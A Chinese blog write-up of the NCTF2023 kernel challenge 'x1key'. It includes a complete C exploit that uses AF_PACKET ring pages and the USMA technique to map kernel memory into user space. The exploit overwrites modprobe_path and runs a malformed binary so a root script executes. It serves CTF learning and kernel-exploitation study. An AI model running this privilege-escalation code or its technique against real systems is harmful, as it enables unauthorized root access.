【dir+USMA】NCTF2023 - x1key

已于 2024-01-17 18:00:38 修改
阅读量449 收藏 10
点赞数 7
分类专栏: # kernel-pwn 文章标签: USMA
于 2023-12-26 10:22:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/135214431
版权

漏洞分析

保护:smap、smep、pti、kaslr

漏洞在 x1key_ioctl 函数中:

测试发现题目是 slab 分配器,并且没开 SLAB_FREELIST_RANDOM

漏洞利用

USMA 劫持 modprobe_path

0x20大小的堆块,发现并没有便于利用的结构体,但是因为没开 SLAB_FREELIST_RANDOM,所以堆块的分配可预测。

而我们知道堆块是在直接映射区分配的,而直接映射区映射了所有的物理内存,自然也映射了 modprobe_path 所在页:

并且测试发现其低20位不变为0x2a0c0,并且0x80后内存不可访问,所以这里就只有0x80种情况

我们可以利用 USMA 将 modprobe_path 的 dir page 映射到用户空间进行修改。

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>


void err_exit(char* msg)
{
        printf("[X] Error at %s\n", msg);
        exit(-1);
}

void unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;

    if(unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET))
        err_exit("FAILED to create a new namespace");

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);
}

#ifndef ETH_P_ALL
#define ETH_P_ALL 0x0003
#endif

void packet_socket_rx_ring_init(int s, unsigned int block_size,
                                unsigned int frame_size, unsigned int block_nr,
                                unsigned int sizeof_priv, unsigned int timeout) {
    int v = TPACKET_V3;
    int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
    if (rv < 0) puts("setsockopt(PACKET_VERSION)"), exit(-1);

    struct tpacket_req3 req;
    memset(&req, 0, sizeof(req));
    req.tp_block_size = block_size;
    req.tp_frame_size = frame_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_nr = (block_size * block_nr) / frame_size;
    req.tp_retire_blk_tov = timeout;
    req.tp_sizeof_priv = sizeof_priv;
    req.tp_feature_req_word = 0;

    rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (rv < 0) puts("setsockopt(PACKET_RX_RING)"), exit(-1);
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) puts("socket(AF_PACKET)"), exit(-1);

    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, timeout);

    struct sockaddr_ll sa;
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = PF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = if_nametoindex("lo");
    sa.sll_hatype = 0;
    sa.sll_pkttype = 0;
    sa.sll_halen = 0;

    int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
    if (rv < 0) puts("bind(AF_PACKET)"), exit(-1);

    return s;
}
// count 为 pg_vec 数组的大小, 即 pg_vec 的大小为 count*8
// size/4096 为要分配的 order
int pagealloc_pad(int count, int size) {
    return packet_socket_setup(size, 2048, count, 0, 100);
}

typedef struct request {
        unsigned int idx;
        unsigned int content;
}request;

int fd;
void add()
{
        request req = { 0 };
        ioctl(fd, 0x101, &req);
}

void edit(unsigned int idx, unsigned int content)
{
        request req = { .idx = idx, .content = content };
        ioctl(fd, 0x102, &req);
}

void get_flag(){
        system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x"); // modeprobe_path 修改为了 /tmp/x
        system("chmod +x /tmp/x");
        system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy"); // 非法格式的二进制文件
        system("chmod +x /tmp/dummy");
        system("/tmp/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 指向的文件 /tmp/x
        sleep(0.3);
        system("cat /flag");
        exit(0);
}

int main(int argc, char** argv, char** env)
{

        unshare_setup();
        fd = open("/dev/x1key", O_RDONLY);

        int shm_fd = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT|0666);
        char* shm_ptr = shmat(shm_fd, NULL, SHM_RDONLY);

        add();

        shmdt(shm_ptr);

        int nr = 0x20 / 8;
        int packet_fd = pagealloc_pad(nr, 0x1000);

        char *page = NULL, *modprobe_path = NULL;
        for (int i = 0; i < 0x80; i++)
        {
                edit(0, (i<<20)|0x2a000);
                page = mmap(NULL, 0x1000*nr, PROT_READ|PROT_WRITE, MAP_SHARED, packet_fd, 0);
                if (page == -1) continue;
                modprobe_path = page + 0x1000*(nr-1) + 0xc0;
                if (!strcmp(modprobe_path, "/sbin/modprobe")) break;
                munmap(page, 0x1000*nr);
        }

        strcpy(modprobe_path, "/tmp/x");
        munmap(page, 0x1000*nr);
        get_flag();
        puts("[+] EXP NEVER END");
        return 0;
}

效果如下:

XiaozaYa
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
attack demo - USMA
blind cat
02-06 410
允许普通用户进程可以映射内核态内存并且修改内核代码段,通过这个方法,我们可以绕过Linux内核中的CFI缓解措施,在内核态中执行任意代码。
通过python实现一个简易的reg_model
m0_61507872的博客
05-31 747
python实现简易的register model
2023-10-22
qq_61670993的博客
10-22 64
2023-10-22
2023-10-21
qq_61670993的博客
10-22 54
2023-10-21
2023-10-23
qq_61670993的博客
10-24 44
2023-10-23
2023-10-28/29
qq_61670993的博客
10-29 84
2023-10-29
【slab/0x40 UAF】TPCTF2023 - core 一题多解
qq_61670993的博客
12-02 994
菜就多练
USMA】N1CTF2022-praymoon
qq_61670993的博客
10-22 597
USMA
CVE-2022-34918:nftables 中 nft_setelem_parse_data 错误验证导致的类型混淆,从而导致的堆溢出写
qq_61670993的博客
05-21 774
类型混淆导致的堆溢出
RTC-how to create work items.
07-29
1. 首先,你需要保存链接到你的书签:`https://igartc02.swg.usma.ibm.com/jazz/web/projects/B2B%20and%20IEBX%20Life%20Cycle%20Management%20%28LCM%29`。这是一个特定的RTC项目区域页面,你需要使用你的IBM用户...
基于stm32库文件开发的音乐播放器实验完整源码例程,直接编译,可以运行.zip
05-17
//初始化USMA RT LED_Init(); //初始化与LED连接的硬件接口 KEY_Init(); //初始化按键 LCD_Init(); //初始化LCD W25QXX_Init(); //初始化W25Q128 VS_Init(); //初始化VS1053 ...
100款古风PPT (24)(1).pptx
最新发布
06-24
【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
-电容层析成像三维图像重建研究
06-24
-电容层析成像三维图像重建研究
基于matlab跨年烟花代码
06-24
**仿真咨询 1 各类智能优化算法改进及应用** 生产调度、经济调度、装配线调度、充电优化、车间调度、发车优化、水库调度、三维装箱、物流选址、货位优化、公交排班优化、充电桩布局优化、车间布局优化、集装箱船配载优化、水泵组合优化、解医疗资源分配优化、设施布局优化、可视域基站和无人机选址优化 **2 机器学习和深度学习方面** 卷积神经网络(CNN)、LSTM、支持向量机(SVM)、最小二乘支持向量机(LSSVM)、极限学习机(ELM)、核极限学习机(KELM)、BP、RBF、宽度学习、DBN、RF、RBF、DELM、XGBOOST、TCN实现风电预测、光伏预测、电池寿命预测、辐射源识别、交通流预测、负荷预测、股价预测、PM2.5浓度预测、电池健康状态预测、水体光学参数反演、NLOS信号识别、地铁停车精准预测、变压器故障诊断 **3 图像处理方面** 图像识别、图像分割、图像检测、图像隐藏、图像配准、图像拼接、图像融合、图像增强、图像压缩感知 **4 路径规划方面** 旅行商问题(TSP)、车辆路径问题(VRP、MVRP、CVRP、VRPTW等)、无人机三维路径规划、无人机协同、无人
STP4407-VB一款P-Channel沟道SOP8的MOSFET晶体管参数介绍与应用说明
06-24
SOP8;P—Channel沟道,-30V;-11A;RDS(ON)=10mΩ@VGS=10V,VGS=20V;Vth=-1.42V;
apache-tomcat-11.0.0-M20.exe包
06-24
apache-tomcat-11.0.0-M20.exe包 Apache Tomcat 11.0.0-M20 是 Apache Tomcat 11 的一个里程碑版本。它是 Apache 软件基金会开发的一个开源的 Java Servlet 容器,用于实现 Java Servlet 和 JavaServer Pages 技术。具体来说,Tomcat 11.0.0-M20 可能包括了一些新的功能、改进、bug 修复和性能优化,同时也可能包含了一些试验性质的特性,因为它是一个 Milestone(里程碑)版本,通常用于测试和验证新功能。 支持最新的 Servlet 规范:Tomcat 11.0.0-M20 可能支持最新的 Java Servlet 规范,例如 Servlet 5.0 规范,这意味着开发者可以利用最新的 Java EE 功能和改进。 性能优化:每个新版本通常都会包含性能优化的改进,以提高请求处理速度、资源利用率和响应时间。 安全性增强:Tomcat 团队通常会更新和改进安全功能,以应对最新的安全威胁和漏洞,确保服务器和应用程序的安全性。
基于ATmega16单片机的流量控制器的开发
06-24
流量控制器的核心是单片机,它直接关系到控制器设计的可靠性、复杂性以及开发周期。选用ATmega16单片机具有很多好处。它具备1MIPS/MHz(百万条指令每秒/兆赫兹)的高速处理能力,并具有强大的片内外设。因此,本系统虽然只进行了较少的外围电路设计却能够实现复杂的系统功能,包括变频器的数字PID控制、步进电机驱动器的控制、三个LED的显示、四个按键的输入扫描、同PC的RS232通信等。此外,ATmega16单片机更适宜用高级语言编程,从而能够大大缩短软件的开发周期。本次设计采用了ImageCaft公司的ICC AVRC语言编译器。在软件设计上,采用了时间触发嵌入式系统设计模式。先对单片机的任务进行划分,然后创建混合式调度器对不同性质的任务进行调度,从而保证了软件的实时性、可靠性、易读性。本文详细介绍了它的硬件设计与软件架构。
儿童节相关庆祝代码&项目
06-24
儿童节,即每年的6月1日,是一个专门为了庆祝和纪念孩子们而设立的节日。在这一天,儿童们可以感受到无尽的快乐与关爱,并参与各种丰富多彩的活动。以下是关于儿童节的详细信息和庆祝活动: 一、儿童节的由来 儿童节起源于20世纪,旨在保护儿童权益、改善儿童生活,并强调儿童在社会发展中的重要性。这一节日的设立,为全世界的孩子们提供了一个表达自我、享受快乐的平台。 二、儿童节的传统风俗 拜神祭祖:在一些地区,家庭会安排儿童前往祖宗的墓地或祖庙进行拜祭仪式,表达对祖先的敬意和感激之情。 舞狮表演:舞狮是中国传统的民间艺术表演形式,也是儿童节的一大特色。孩子们穿上鲜艳的狮头和狮身服装,模仿狮子的动作,传递出狮子的勇猛和活泼的气息。 游园会:在城市的公园和游乐场,通常会举办各种游戏和娱乐项目,如亲子跳绳、绘画比赛、讲故事比赛等,让孩子们参与其中,体验乐趣并与其他小伙伴互动交流。 制作手工艺品:许多学校和社区会组织孩子们参与手工艺品制作的活动,如剪纸、折纸、粘贴、织花等,培养孩子们的创造力和想象力。 亲子健身活动:儿童节也是鼓励孩子们参与体育活动的好时机,学校和体育中心会组织各种运动项目,如足球、篮球、游
基于matlab ChatGPT接入项目实例.m
06-24
**仿真咨询 1 各类智能优化算法改进及应用** 生产调度、经济调度、装配线调度、充电优化、车间调度、发车优化、水库调度、三维装箱、物流选址、货位优化、公交排班优化、充电桩布局优化、车间布局优化、集装箱船配载优化、水泵组合优化、解医疗资源分配优化、设施布局优化、可视域基站和无人机选址优化 **2 机器学习和深度学习方面** 卷积神经网络(CNN)、LSTM、支持向量机(SVM)、最小二乘支持向量机(LSSVM)、极限学习机(ELM)、核极限学习机(KELM)、BP、RBF、宽度学习、DBN、RF、RBF、DELM、XGBOOST、TCN实现风电预测、光伏预测、电池寿命预测、辐射源识别、交通流预测、负荷预测、股价预测、PM2.5浓度预测、电池健康状态预测、水体光学参数反演、NLOS信号识别、地铁停车精准预测、变压器故障诊断 **3 图像处理方面** 图像识别、图像分割、图像检测、图像隐藏、图像配准、图像拼接、图像融合、图像增强、图像压缩感知 **4 路径规划方面** 旅行商问题(TSP)、车辆路径问题(VRP、MVRP、CVRP、VRPTW等)、无人机三维路径规划、无人机协同、无人

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值